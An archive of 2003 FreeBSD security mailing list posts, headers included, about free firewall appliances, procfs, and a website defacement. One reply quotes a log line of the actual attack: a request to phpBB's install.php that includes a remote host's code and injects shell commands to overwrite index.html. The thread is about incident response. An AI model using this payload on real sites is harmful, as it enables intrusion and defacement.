List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 05 Nov 2003 18:10:11 -0000 twig les wrote: >Hey *, as I sweat through another day of crap dealing with an >all-in-one box (firewall, IDS, AVS, report generating, soon to >be a VPN server) I'm wondering if someone has started a project >to put some freeware together in some semblance of sanity on a >FBSD box. There's basically nothing that this box does that a >combo of IPFW (or another bsd filter), snort, ntop, and some >other freeware stuff can't do. > >As usual the problems I face stem from feature-overload, since >the vendor has one crappy feature and then adds another crappy >feature instead of fixing the first one so they can market the >box better. I'm thinking that since the tools I mentioned are >already fairly mature and robust, all that's needed is some >sewing and, when core functionality is achieved, a GUI. > >This sounds like a fun project IMO, but I don't want to >re-invent the wheel, especially when I have no spare time. > > Hey Twig, I'm currently working on one of these 'crappy appliances' as you call them (except this one rocks). It'd be helpful for us to know what kinds of problems your appliance has/what beef you have with it so we can make our better. Sorry that this reply is a bit off-topic, since you're looking for a freeware one. Perhaps when we've made our fortune on it we can be arsed to release it BSD-style (no guarantees though, of course :)). Hope to hear from you soon! Kind regards, Devon H. O'Dell From owner-freebsd-security@FreeBSD.ORG Wed Nov 5 12:41:13 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D0AE716A4CE for ; Wed, 5 Nov 2003 12:41:13 -0800 (PST) Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by mx1.FreeBSD.org (Postfix) with ESMTP id E0C4643FE5 for ; Wed, 5 Nov 2003 12:41:07 -0800 (PST) (envelope-from m.seaman@infracaninophile.co.uk) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost [127.0.0.1]) hA5KeXwk054367 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Wed, 5 Nov 2003 20:41:03 GMT (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost)id hA5KeXXW054366; Wed, 5 Nov 2003 20:40:33 GMT (envelope-from matthew) Date: Wed, 5 Nov 2003 20:40:33 +0000 From: Matthew Seaman To: twig les Message-ID: <20031105204033.GB53439@happy-idiot-talk.infracaninophile.co.uk> Mail-Followup-To: twig les , freebsd-security@freebsd.org References: <20031105180158.48435.qmail@web60408.mail.yahoo.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="WYTEVAkct0FjGQmd" Content-Disposition: inline In-Reply-To: <20031105180158.48435.qmail@web60408.mail.yahoo.com> User-Agent: Mutt/1.5.4i X-Spam-Status: No, hits=-4.8 required=5.0 tests=AWL,BAYES_00 autolearn=ham version=2.60 X-Spam-Checker-Version: SpamAssassin 2.60 (1.212-2003-09-23-exp) on happy-idiot-talk.infracaninophile.co.uk cc: freebsd-security@freebsd.org Subject: Re: FBSD All-in-one security box? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 05 Nov 2003 20:41:14 -0000 --WYTEVAkct0FjGQmd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 05, 2003 at 10:01:58AM -0800, twig les wrote: > Hey *, as I sweat through another day of crap dealing with an > all-in-one box (firewall, IDS, AVS, report generating, soon to > be a VPN server) I'm wondering if someone has started a project > to put some freeware together in some semblance of sanity on a > FBSD box. There's basically nothing that this box does that a > combo of IPFW (or another bsd filter), snort, ntop, and some > other freeware stuff can't do. http://www.exoserver.com/ perhaps? I believe these are FreeBSD based -- they certainly have people with @FreeBSD.org addresses working for them... Cheers, Matthew --=20 Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way PGP: http://www.infracaninophile.co.uk/pgpkey Marlow Tel: +44 1628 476614 Bucks., SL7 1TH UK --WYTEVAkct0FjGQmd Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (FreeBSD) iD8DBQE/qWBBdtESqEQa7a0RAhP4AJ90mVybZVm0tWy6ftW+2BA/WaZvtQCeOZXN Z0JNohkPpkpn/aJLiu/ui7E= =w4fW -----END PGP SIGNATURE----- --WYTEVAkct0FjGQmd-- From owner-freebsd-security@FreeBSD.ORG Wed Nov 5 12:50:18 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9774916A4CE for ; Wed, 5 Nov 2003 12:50:18 -0800 (PST) Received: from mx.sat.corp.rackspace.com (mx.sat.corp.rackspace.com [64.39.1.217]) by mx1.FreeBSD.org (Postfix) with ESMTP id D7E1143FA3 for ; Wed, 5 Nov 2003 12:50:16 -0800 (PST) (envelope-from amason@rackspace.com) Received: from mail.rackspace.com (mail.rackspace.com [64.39.2.181]) hA5KmUZ9011482 for ; Wed, 5 Nov 2003 14:48:30 -0600 Received: from [10.1.101.24] (office101-24.sat.rackspace.com [10.1.101.24]) by mail.rackspace.com (8.12.10/8.12.10) with ESMTP id hA5KoE32024663 for ; Wed, 5 Nov 2003 14:50:14 -0600 From: Art Mason To: freebsd-security@freebsd.org In-Reply-To: <20031105180158.48435.qmail@web60408.mail.yahoo.com> References: <20031105180158.48435.qmail@web60408.mail.yahoo.com> Content-Type: text/plain Organization: Rackspace Managed Hosting Message-Id: <1068065410.305.10.camel@mizar.rackspace.com> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.5 Date: Wed, 05 Nov 2003 14:50:10 -0600 Content-Transfer-Encoding: 7bit X-MailScanner: Dd6rvCg9: Found to be clean Subject: Re: FBSD All-in-one security box? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 05 Nov 2003 20:50:18 -0000 Hmmm, sounds a lot like Mandrake MNF (http://www.mandrakesoft.com/products/mnf) hopes to become. . I'd love to see something like this (PHP and PERL frontend) for a FreeBSD-based wonder box. I wonder if one could take the m0n0wall project (http://m0n0.ch/wall/) and expand it for a full blown network appliance. On Wed, 2003-11-05 at 12:01, twig les wrote: > Hey *, as I sweat through another day of crap dealing with an > all-in-one box (firewall, IDS, AVS, report generating, soon to > be a VPN server) I'm wondering if someone has started a project > to put some freeware together in some semblance of sanity on a > FBSD box. There's basically nothing that this box does that a > combo of IPFW (or another bsd filter), snort, ntop, and some > other freeware stuff can't do. > > As usual the problems I face stem from feature-overload, since > the vendor has one crappy feature and then adds another crappy > feature instead of fixing the first one so they can market the > box better. I'm thinking that since the tools I mentioned are > already fairly mature and robust, all that's needed is some > sewing and, when core functionality is achieved, a GUI. > > This sounds like a fun project IMO, but I don't want to > re-invent the wheel, especially when I have no spare time. > > ===== > ----------------------------------------------------------- > Get a taste of Religion ... eat a priest! > ----------------------------------------------------------- > > __________________________________ > Do you Yahoo!? > Protect your identity with Yahoo! Mail AddressGuard > http://antispam.yahoo.com/whatsnewfree > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" -- Art Mason Rackspace Managed Hosting amason@rackspace.com From owner-freebsd-security@FreeBSD.ORG Thu Nov 6 01:17:14 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6BF2816A4CE for ; Thu, 6 Nov 2003 01:17:14 -0800 (PST) Received: from creature.tScope.ru (www.telecom.ural.ru [195.38.57.164]) by mx1.FreeBSD.org (Postfix) with ESMTP id EF0E043FE9 for ; Thu, 6 Nov 2003 01:17:10 -0800 (PST) (envelope-from kurilov@tscp.ru) Received: from [195.38.57.163] ([195.38.57.163]) by creature.tScope.ru (8.12.9/8.12.6) with ESMTP id hA69HUET012275 for ; Thu, 6 Nov 2003 14:17:30 +0500 (YEKT) (envelope-from kurilov@tscp.ru) From: "Kurilov D.I." To: freebsd-security@freebsd.org Content-Type: text/plain Organization: Message-Id: <1068110526.3125.14.camel@dmk.tscp.ru> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.1- (1.2.1-alt3) Date: 06 Nov 2003 14:22:06 +0500 Content-Transfer-Encoding: 7bit Subject: X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: kurilov@tscp.ru List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 06 Nov 2003 09:17:14 -0000 From owner-freebsd-security@FreeBSD.ORG Thu Nov 6 01:20:14 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E750116A4CE for ; Thu, 6 Nov 2003 01:20:14 -0800 (PST) Received: from creature.tScope.ru (www.telecom.ural.ru [195.38.57.164]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7BC5743FA3 for ; Thu, 6 Nov 2003 01:20:13 -0800 (PST) (envelope-from kurilov@tscp.ru) Received: from [195.38.57.163] ([195.38.57.163]) by creature.tScope.ru (8.12.9/8.12.6) with ESMTP id hA69KWET012328 for ; Thu, 6 Nov 2003 14:20:32 +0500 (YEKT) (envelope-from kurilov@tscp.ru) From: "Kurilov D.I." To: freebsd-security@freebsd.org Content-Type: text/plain Organization: Message-Id: <1068110709.3125.20.camel@dmk.tscp.ru> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.1- (1.2.1-alt3) Date: 06 Nov 2003 14:25:09 +0500 Content-Transfer-Encoding: 7bit Subject: kurilov@tscp.ru X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: kurilov@tscp.ru List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 06 Nov 2003 09:20:15 -0000 From owner-freebsd-security@FreeBSD.ORG Thu Nov 6 03:45:03 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5056D16A4CE for ; Thu, 6 Nov 2003 03:45:03 -0800 (PST) Received: from host185.dolanmedia.com (host185.dolanmedia.com [209.98.197.185]) by mx1.FreeBSD.org (Postfix) with SMTP id 023C243FEC for ; Thu, 6 Nov 2003 03:45:01 -0800 (PST) (envelope-from greg.panula@lexisnexis.com) Received: (qmail 38762 invoked by uid 0); 6 Nov 2003 11:45:00 -0000 Received: from greg.panula@lexisnexis.com by proxy by uid 82 with qmail-scanner-1.16 ( Clear:. Processed in 1.871692 secs); 06 Nov 2003 11:45:00 -0000 X-Qmail-Scanner-Mail-From: greg.panula@lexisnexis.com via proxy X-Qmail-Scanner-Rcpt-To: freebsd-security@freebsd.org X-Qmail-Scanner: 1.16 (Clear:. Processed in 1.871692 secs) Received: from unknown (HELO mail.dolanmedia.com) (10.1.1.23) by host185.dolanmedia.com with SMTP; 6 Nov 2003 11:44:57 -0000 Received: from lexisnexis.com (10.1.1.135) by mail.dolanmedia.com (Worldmail 1.3.167) for freebsd-security@freebsd.org; 6 Nov 2003 05:43:07 -0600 Message-ID: <3FAA3439.5040602@lexisnexis.com> Date: Thu, 06 Nov 2003 05:44:57 -0600 From: "G. Panula" User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.4) Gecko/20030918 X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-security@freebsd.org References: <20031105180158.48435.qmail@web60408.mail.yahoo.com> In-Reply-To: <20031105180158.48435.qmail@web60408.mail.yahoo.com> X-Enigmail-Version: 0.76.7.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Subject: Re: FBSD All-in-one security box? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 06 Nov 2003 11:45:03 -0000 twig les wrote: > Hey *, as I sweat through another day of crap dealing with an > all-in-one box (firewall, IDS, AVS, report generating, soon to > be a VPN server) I'm wondering if someone has started a project > to put some freeware together in some semblance of sanity on a > FBSD box. There's basically nothing that this box does that a > combo of IPFW (or another bsd filter), snort, ntop, and some > other freeware stuff can't do. > > As usual the problems I face stem from feature-overload, since > the vendor has one crappy feature and then adds another crappy > feature instead of fixing the first one so they can market the > box better. I'm thinking that since the tools I mentioned are > already fairly mature and robust, all that's needed is some > sewing and, when core functionality is achieved, a GUI. > > This sounds like a fun project IMO, but I don't want to > re-invent the wheel, especially when I have no spare time. > http://www.netboz.net/ is a self-contained bootable cd that provides firewall, nat, dns, dhcp and vpn(in beta currently). Just need a floppy to write configs to and you're off&running. yup, its fbsd based. I've only played with it a little, but it was solid enough. I think it is just missing IDS&AVS from your wishlist above. Online demo available at: https://demo.netboz.net/ greg From owner-freebsd-security@FreeBSD.ORG Thu Nov 6 08:42:59 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B776616A4CE for ; Thu, 6 Nov 2003 08:42:59 -0800 (PST) Received: from eth0.a.smtp.sonic.net (eth0.a.smtp.sonic.net [64.142.16.244]) by mx1.FreeBSD.org (Postfix) with ESMTP id B410B43FE9 for ; Thu, 6 Nov 2003 08:42:58 -0800 (PST) (envelope-from bmah@intruder.kitchenlab.org) Received: from intruder.kitchenlab.org (adsl-64-142-31-106.sonic.net [64.142.31.106])hA6GgvlT028367 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Thu, 6 Nov 2003 08:42:58 -0800 Received: from intruder.kitchenlab.org (bmah@localhost [127.0.0.1]) hA6Ggv1j071871; Thu, 6 Nov 2003 08:42:57 -0800 (PST) (envelope-from bmah@intruder.kitchenlab.org) Message-Id: <200311061642.hA6Ggv1j071871@intruder.kitchenlab.org> X-Mailer: exmh version 2.6.3 04/04/2003 with nmh-1.0.4 To: Art Mason In-Reply-To: <1068065410.305.10.camel@mizar.rackspace.com> References: <20031105180158.48435.qmail@web60408.mail.yahoo.com> <1068065410.305.10.camel@mizar.rackspace.com> Comments: In-reply-to Art Mason message dated "Wed, 05 Nov 2003 14:50:10 -0600." From: "Bruce A. Mah" X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-Url: http://www.employees.org/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_260618427P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Thu, 06 Nov 2003 08:42:57 -0800 Sender: bmah@intruder.kitchenlab.org cc: freebsd-security@FreeBSD.org Subject: Re: FBSD All-in-one security box? X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: bmah@FreeBSD.org List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 06 Nov 2003 16:42:59 -0000 --==_Exmh_260618427P Content-Type: text/plain; charset=us-ascii If memory serves me right, Art Mason wrote: > Hmmm, sounds a lot like Mandrake MNF > (http://www.mandrakesoft.com/products/mnf) hopes to become. . I'd love > to see something like this (PHP and PERL frontend) for a FreeBSD-based > wonder box. I wonder if one could take the m0n0wall project > (http://m0n0.ch/wall/) and expand it for a full blown network appliance. I'm using a Soekris 4501 running m0n0wall as a filtering bridge at home. It's quite a nice package IMHO, although a little difficult to customize if you want to hack on it. (The single feature I would love to see most in m0n0wall is a way to check out a source tree, type "make release", and wind up with an update image.) Bruce. --==_Exmh_260618427P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (FreeBSD) Comment: Exmh version 2.5+ 20020506 iD8DBQE/qnoR2MoxcVugUsMRAvz6AJ4sX5FHEOA+K1pZG7mRxSfAFOXMaQCguXC1 XHnQqCeBmfYT8JNOJcM5WC8= =aYcj -----END PGP SIGNATURE----- --==_Exmh_260618427P-- From owner-freebsd-security@FreeBSD.ORG Thu Nov 6 10:44:22 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B0EE816A4CE for ; Thu, 6 Nov 2003 10:44:22 -0800 (PST) Received: from mail.broadpark.no (mail.broadpark.no [217.13.4.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id D6EEC43FB1 for ; Thu, 6 Nov 2003 10:44:16 -0800 (PST) (envelope-from des@des.no) Received: from smtp.des.no (37.80-203-228.nextgentel.com [80.203.228.37]) by mail.broadpark.no (Postfix) with ESMTP id 761BA78CFF; Thu, 6 Nov 2003 19:44:15 +0100 (MET) Received: by smtp.des.no (Pony Express, from userid 666) id 269A49B588; Thu, 6 Nov 2003 19:44:15 +0100 (CET) Received: from dwp.des.no (dwp.des.no [10.0.0.4]) by smtp.des.no (Pony Express) with ESMTP id 3016795982; Thu, 6 Nov 2003 19:44:11 +0100 (CET) Received: by dwp.des.no (Postfix, from userid 2602) id 61377B828; Thu, 6 Nov 2003 19:44:11 +0100 (CET) To: Kim Needham References: <20031104180932.GA70958@rot13.obsecurity.org> <001901c3a2de$7ab72c10$6855cd80@dhcp.hwi.buffalo.edu> <20031104180932.GA70958@rot13.obsecurity.org> <5.2.0.9.0.20031105114806.00b34b98@mail.chariot.net.au> From: des@des.no (Dag-Erling =?iso-8859-1?q?Sm=F8rgrav?=) Date: Thu, 06 Nov 2003 19:44:11 +0100 In-Reply-To: <5.2.0.9.0.20031105114806.00b34b98@mail.chariot.net.au> (Kim Needham's message of "Wed, 05 Nov 2003 11:58:21 +1030") Message-ID: User-Agent: Gnus/5.090024 (Oort Gnus v0.24) Emacs/21.3 (berkeley-unix) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Spam-Checker-Version: SpamAssassin 2.60 (1.212-2003-09-23-exp) on dsa.des.no X-Spam-Level: X-Spam-Status: No, hits=0.0 required=5.0 tests=none autolearn=no version=2.60 cc: freebsd-security@freebsd.org cc: Robert Collins Subject: Re: Veractiy and FreeBSD X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 06 Nov 2003 18:44:22 -0000 Kim Needham writes: > Since FreeBSD 5.x seems to no longer use a mounted proc filesystem but pr= oc > is mounted on the root device, this check will need to be removed for > FreeBSD 5.x. Bollocks. The only practical difference between procfs in 4.x and 5.x is that it is not mounted by default in 5.x. To the original poster, removing PSEUDOFS and PROCFS from the kernel achieves absolutely nothing, as mount_procfs will simply load the module. You need to unmount /proc, remove the corresponding line from /etc/fstab, and read a book or two about Unix system administration (Nemeth, Snyder, Seebass, Hein is a good start) DES --=20 Dag-Erling Sm=F8rgrav - des@des.no From owner-freebsd-security@FreeBSD.ORG Fri Nov 7 04:08:32 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B6D7516A4CE; Fri, 7 Nov 2003 04:08:32 -0800 (PST) Received: from 194-185-53-242.f5.ngi.it (194-185-53-242.f5.ngi.it [194.185.53.242]) by mx1.FreeBSD.org (Postfix) with ESMTP id D8A4B43FF9; Fri, 7 Nov 2003 04:08:27 -0800 (PST) (envelope-from mark@remotelab.org) Received: from remotelab.org (einstein.lab [192.168.168.2]) hA7C8Ppc027841; Fri, 7 Nov 2003 13:08:26 +0100 (CET) (envelope-from mark@remotelab.org) Message-ID: <3FAB8B3A.7020908@remotelab.org> Date: Fri, 07 Nov 2003 13:08:26 +0100 From: Marco Trentini User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5) Gecko/20031013 Thunderbird/0.3 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Miha Nedok References: <20031107125529.R19165@voyager.zrcalo.si> In-Reply-To: <20031107125529.R19165@voyager.zrcalo.si> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit cc: stable@freebsd.org cc: security@freebsd.org Subject: Re: hack ? - urgent X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: mark@remotelab.org List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 07 Nov 2003 12:08:32 -0000 Miha Nedok wrote: > Hi ! > > Today I have noticed some modified index.html files on some of our vhosts. > Is it Apache related ? Does anyone know about this ? > > The content is following: > IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.com Is your apache version update? Maybe IR4DEX knows more about it :) -- Marco Trentini mark@remotelab.org http://www.remotelab.org/ From owner-freebsd-security@FreeBSD.ORG Fri Nov 7 05:04:01 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 33FC816A4CE; Fri, 7 Nov 2003 05:04:01 -0800 (PST) Received: from hotmail.com (law11-f101.law11.hotmail.com [64.4.17.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id A637543F3F; Fri, 7 Nov 2003 05:04:00 -0800 (PST) (envelope-from parisstc@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Fri, 7 Nov 2003 05:04:00 -0800 Received: from 193.218.96.180 by lw11fd.law11.hotmail.msn.com with HTTP; Fri, 07 Nov 2003 13:04:00 GMT X-Originating-IP: [193.218.96.180] X-Originating-Email: [parisstc@hotmail.com] From: "paris stefas" To: mike@voyager.unix-systems.net Date: Fri, 07 Nov 2003 13:04:00 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 07 Nov 2003 13:04:00.0584 (UTC) FILETIME=[9C993C80:01C3A52F] cc: stable@freebsd.org cc: security@freebsd.org Subject: Re: hack ? - urgent X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 07 Nov 2003 13:04:01 -0000 Dude, you got defaced probably or someone from the inside has a great sence of humour :-P >From: Marco Trentini >Reply-To: mark@remotelab.org >To: Miha Nedok >CC: stable@freebsd.org, security@freebsd.org >Subject: Re: hack ? - urgent >Date: Fri, 07 Nov 2003 13:08:26 +0100 > >Miha Nedok wrote: >>Hi ! >> >>Today I have noticed some modified index.html files on some of our vhosts. >>Is it Apache related ? Does anyone know about this ? >> >>The content is following: >>IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.com > >Is your apache version update? > >Maybe IR4DEX knows more about it :) > >-- >Marco Trentini mark@remotelab.org >http://www.remotelab.org/ > >_______________________________________________ >freebsd-security@freebsd.org mailing list >http://lists.freebsd.org/mailman/listinfo/freebsd-security >To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" _________________________________________________________________ The new MSN 8: advanced junk mail protection and 2 months FREE* http://join.msn.com/?page=features/junkmail From owner-freebsd-security@FreeBSD.ORG Fri Nov 7 11:49:03 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 071C816A4CE for ; Fri, 7 Nov 2003 11:49:03 -0800 (PST) Received: from ns1.tiadon.com (SMTP.tiadon.com [69.27.132.161]) by mx1.FreeBSD.org (Postfix) with ESMTP id 30EDB43F85 for ; Fri, 7 Nov 2003 11:49:02 -0800 (PST) (envelope-from kdk@daleco.biz) Received: from daleco.biz ([69.27.131.0]) by ns1.tiadon.com with Microsoft SMTPSVC(6.0.3790.0); Fri, 7 Nov 2003 13:51:46 -0600 Message-ID: <3FABF71A.7000903@daleco.biz> Date: Fri, 07 Nov 2003 13:48:42 -0600 From: "Kevin D. Kinsey, DaleCo, S.P." User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.4) Gecko/20030920 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Miha Nedok References: <20031107125529.R19165@voyager.zrcalo.si> <3FAB8B3A.7020908@remotelab.org> <20031107132650.H19165@voyager.zrcalo.si> In-Reply-To: <20031107132650.H19165@voyager.zrcalo.si> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 07 Nov 2003 19:51:47.0203 (UTC) FILETIME=[93D70530:01C3A568] cc: freebsd-security@freebsd.org Subject: Re: hack ? - urgent - false FreeBSD alarm X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 07 Nov 2003 19:49:03 -0000 Miha Nedok wrote: >Hi ! > >It is phpBB related. I found in logs: >200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET >/forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site- >name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html >HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" > > > >I just did chmod 000 `find -name 'install.php'` for a workaround. > >Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 . > > > >-Miha > > > > > From ~/phpp/docs/Install.html: _6. Important post-Install tasks for all installation methods_ Once you have succssfully installed phpBB 2.0.0 you *MUST* ensure you remove install.php, upgrade.php and update_to_FINAL.php files. Leaving these in place is a _very serious potential security issue_. Additionally you may delete the db/schemas, docs/ and contrib/ directories if you wish. From owner-freebsd-security@FreeBSD.ORG Sat Nov 8 15:41:56 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9B75F16A4DC for ; Sat, 8 Nov 2003 15:41:56 -0800 (PST) Received: from mail.intellex.com (mail.intellex.com [199.233.213.4]) by mx1.FreeBSD.org (Postfix) with SMTP id 1850344001 for ; Sat, 8 Nov 2003 15:41:43 -0800 (PST) (envelope-from root@mail.intellex.com) Received: (qmail 409 invoked by uid 0); 8 Nov 2003 23:45:57 -0000 Received: (qmail 59386 invoked from network); 7 Nov 2003 12:17:06 -0000 Received: from mx2.freebsd.org (216.136.204.119) by mail.intellex.com with SMTP; 7 Nov 2003 12:17:06 -0000 Received: from hub.freebsd.org (hub.freebsd.org [216.136.204.18]) by mx2.freebsd.org (Postfix) with ESMTP id B78605789B; Fri, 7 Nov 2003 04:09:43 -0800 (PST) (envelope-from owner-freebsd-stable@freebsd.org) Received: from hub.freebsd.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 095B816A4E9; Fri, 7 Nov 2003 04:09:41 -0800 (PST) Delivered-To: freebsd-stable@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B6D7516A4CE; Fri, 7 Nov 2003 04:08:32 -0800 (PST) Received: from 194-185-53-242.f5.ngi.it (194-185-53-242.f5.ngi.it [194.185.53.242]) by mx1.FreeBSD.org (Postfix) with ESMTP id D8A4B43FF9; Fri, 7 Nov 2003 04:08:27 -0800 (PST) (envelope-from mark@remotelab.org) Received: from remotelab.org (einstein.lab [192.168.168.2]) hA7C8Ppc027841; Fri, 7 Nov 2003 13:08:26 +0100 (CET) (envelope-from mark@remotelab.org) Message-ID: <3FAB8B3A.7020908@remotelab.org> Date: Fri, 07 Nov 2003 13:08:26 +0100 From: Marco Trentini User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5) Gecko/20031013 Thunderbird/0.3 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Miha Nedok References: <20031107125529.R19165@voyager.zrcalo.si> In-Reply-To: <20031107125529.R19165@voyager.zrcalo.si> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-stable@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Sender: owner-freebsd-stable@freebsd.org Errors-To: owner-freebsd-stable@freebsd.org cc: stable@freebsd.org cc: security@freebsd.org Subject: Re: hack ? - urgent X-BeenThere: freebsd-security@freebsd.org Reply-To: mark@remotelab.org List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 08 Nov 2003 23:41:56 